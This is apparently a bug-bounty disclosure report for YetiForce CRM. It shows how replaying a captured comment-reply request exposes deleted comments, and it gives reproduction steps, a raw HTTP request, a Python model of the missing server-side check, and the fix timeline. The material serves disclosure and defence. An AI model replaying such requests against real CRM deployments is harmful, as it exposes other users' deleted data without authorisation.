User can get details of the comments that were deleted in yetiforcecompany/yetiforcecrm

Valid

Reported on

Sep 19th 2022


Description

When a user creates a new record, they can add a comment to it. The user can also delete the comment, after which the user won't have access to it, for example to reply to it or to check what the comment was. This vulnerability allows any user to see what the deleted comment was and also to reply to that comment.

Proof of Concept

1. Log in to the application https://gitstable.yetiforce.com/index.php?module=Accounts&view=Detail&record=2029 .

2. Go to create records and create a new one.

3. Enter a new comment and click on save.

4. Reply to the comment you created and intercept the request.

5. Send the request to the repeater.

6. Delete the comment that you created.

7. Send the request in the repeater; the details of the deleted comment are exposed.

```
POST /index.php HTTP/1.1
Host: gitstable.yetiforce.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 153
Origin: https://gitstable.yetiforce.com
Connection: close
Cookie: YTSID=50trt9s5he1qontpsn2ktvdab9; _pk_id.10.6d7c=d037ceed70283778.1663586607.; _pk_ses.10.6d7c=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

_csrf=sid:3eb187103ad72d3dbb5c9c5cbe0d059c0111704b,1663590705&action=SaveAjax&commentcontent=test&related_to=2029&module=ModComments&parent_comments=2054
```



Impact

The user can get details of all the comments that were deleted by other users.
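
The server-side check this report points to, as an added example that is not part of the original report and not YetiForce's code: a small Python model in which a reply handler resolves `parent_comments` by ID alone, next to a version that rejects deleted or foreign parents. The in-memory store, the function names, the response shape and the `can_view` callback are assumptions made for illustration.

```python
from dataclasses import dataclass

class Forbidden(Exception):
    """Raised when the caller may not use the referenced comment."""

@dataclass
class Comment:
    id: int
    related_to: int        # record the comment is attached to
    content: str
    deleted: bool = False  # soft delete: the row stays in storage

def new_store():
    # Constructed sample data; the IDs mirror the request in the report.
    return {2054: Comment(2054, 2029, "original comment text")}

def add_reply(store, related_to, content):
    reply = Comment(max(store) + 1, related_to, content)
    store[reply.id] = reply
    return reply

def save_reply_unsafe(store, related_to, content, parent_id):
    """Reported behaviour: the parent is resolved by ID alone."""
    parent = store[parent_id]  # no deleted or record check
    reply = add_reply(store, related_to, content)
    return {"id": reply.id,
            "parent": {"id": parent.id, "content": parent.content}}

def save_reply_checked(store, related_to, content, parent_id, can_view):
    """Validate the parent before storing the reply or echoing anything."""
    if not can_view(related_to):
        raise Forbidden("record not accessible")
    parent = store.get(parent_id)
    # One error for missing, deleted and foreign parents, so the response
    # does not confirm which comment IDs once existed.
    if parent is None or parent.deleted or parent.related_to != related_to:
        raise Forbidden("parent comment not available")
    reply = add_reply(store, related_to, content)
    return {"id": reply.id, "parent_id": parent.id}

if __name__ == "__main__":
    store = new_store()
    store[2054].deleted = True  # step 6 of the report: comment deleted
    print(save_reply_unsafe(store, 2029, "test", 2054))
    try:
        save_reply_checked(store, 2029, "test", 2054, lambda rec: True)
    except Forbidden as exc:
        print("rejected:", exc)
```
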
We are processing your report and will contact the yetiforcecompany/yetiforcecrm team within 24 hours. 2 months ago
irfansayyed-github modified the report
2 months ago
We have contacted a member of the yetiforcecompany/yetiforcecrm team and are waiting to hear back 2 months ago
We have sent a follow up to the yetiforcecompany/yetiforcecrm team. We will try again in 7 days. 2 months ago
Radosław Skrzypczak validated this vulnerability 2 months ago
irfansayyed-github has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Radosław Skrzypczak marked this as fixed in 6.4.0 with commit f06e50 2 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
irfansayyed-github
2 months ago

Researcher


@admin,

Could we get a CVE?

Ben Harvie
2 months ago

Admin


Hi irfansayyed-github,

We can assign a CVE to this report at the request of the maintainer.

Thanks
